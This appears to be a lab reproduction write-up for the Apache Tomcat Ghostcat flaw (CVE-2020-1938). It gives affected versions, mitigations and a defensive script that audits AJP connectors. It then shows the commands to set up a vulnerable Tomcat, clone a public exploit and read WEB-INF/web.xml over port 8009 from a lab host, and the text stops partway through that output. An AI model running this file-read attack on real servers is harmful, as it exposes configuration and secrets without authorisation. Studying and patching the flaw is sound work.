Ghostcat Vulnerability Reproduction

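Vulnerability IDs:
CVE-2020-1938
CNVD-2020-10487
Affected versions:
Apache Tomcat = 6
7 <= Apache Tomcat < 7.0.100
8 <= Apache Tomcat < 8.5.51
9 <= Apache Tomcat < 9.0.31
Mitigations:
Set the secretRequired and secret attributes in the AJP connector configuration to enforce authentication;
Temporarily disable the AJP protocol port by commenting it out in the conf/server.xml configuration file;
Update to the latest version;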
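
The mitigations above can be checked mechanically. The following Python script is an added example, not part of the original post or of the Tomcat project: it tests a version string against the affected ranges listed above and audits a server.xml for active AJP connectors that lack secret/secretRequired or an explicit bind address. The function names, the sample configuration and the placeholder secret are constructed for illustration, and version strings are assumed to be purely numeric.

```python
import xml.etree.ElementTree as ET

# First fixed release per major line, taken from the affected ranges on this page.
FIXED = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}

def is_affected(version):
    """True if a purely numeric Tomcat version is in the ranges listed above."""
    v = tuple(int(p) for p in version.split("."))
    if v[0] == 6:
        return True  # the page lists Tomcat 6 as affected without an upper bound
    return v[0] in FIXED and v < FIXED[v[0]]

def audit_ajp(server_xml):
    """Return one finding per active AJP <Connector> in the server.xml text."""
    findings = []
    # ElementTree drops XML comments, so a commented-out connector is skipped.
    for conn in ET.fromstring(server_xml).iter("Connector"):
        proto = conn.get("protocol", "HTTP/1.1")
        if not (proto.upper().startswith("AJP") or ".ajp." in proto.lower()):
            continue
        issues = []
        if not conn.get("secret"):
            issues.append("no secret set")
        if conn.get("secretRequired", "").lower() != "true":
            issues.append("secretRequired not explicitly true")
        if conn.get("address") in (None, "0.0.0.0", "::"):
            issues.append("no explicit non-wildcard address")
        findings.append({"port": conn.get("port"), "issues": issues})
    return findings

# Constructed sample configuration (not taken from the page).
SAMPLE = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <!-- <Connector port="8010" protocol="AJP/1.3" /> -->
    <Connector port="8011" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="PLACEHOLDER-SECRET" />
  </Service>
</Server>"""

if __name__ == "__main__":
    print("8.5.32 affected:", is_affected("8.5.32"))
    for f in audit_ajp(SAMPLE):
        print("AJP port", f["port"], "->", f["issues"] or "ok")
```

To audit a real installation, pass the contents of its conf/server.xml to audit_ajp.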
Setting up the vulnerable environment:

//Download the vulnerable Apache Tomcat package
root@kali:~# wget http://192.168.31.149/CVE-2020-1938-master.zip
//Unzip it
root@kali:~# unzip CVE-2020-1938-master.zip
//Enter the directory
root@kali:~# cd CVE-2020-1938-master/
//Unzip the Apache Tomcat archive
root@kali:~/CVE-2020-1938-master# unzip apache-tomcat-8.5.32.zip
//Enter the directory
root@kali:~/CVE-2020-1938-master# cd apache-tomcat-8.5.32/
//Grant permissions
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32# chmod -R 777 bin/
//Start Tomcat
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32/bin# sh startup.sh

Visit the server in a browser to check that it is running.
Reproduction:

//On the target machine, list the open ports
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32/bin# netstat -anptul
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp6       0      0 :::8009                 :::*                    LISTEN      1389/java           
tcp6       0      0 :::8080                 :::*                    LISTEN      1389/java           
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      1389/java           
udp        0      0 0.0.0.0:68              0.0.0.0:*                           502/dhclient      
//On the attacking machine, download the exploit
root@kali:~# git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
root@kali:~# cd CNVD-2020-10487-Tomcat-Ajp-lfi/
//Read the WEB-INF/web.xml file
root@kali:~/CNVD-2020-10487-Tomcat-Ajp-lfi# python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml 192.168.31.62
Getting resource at ajp13://192.168.31.62:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.

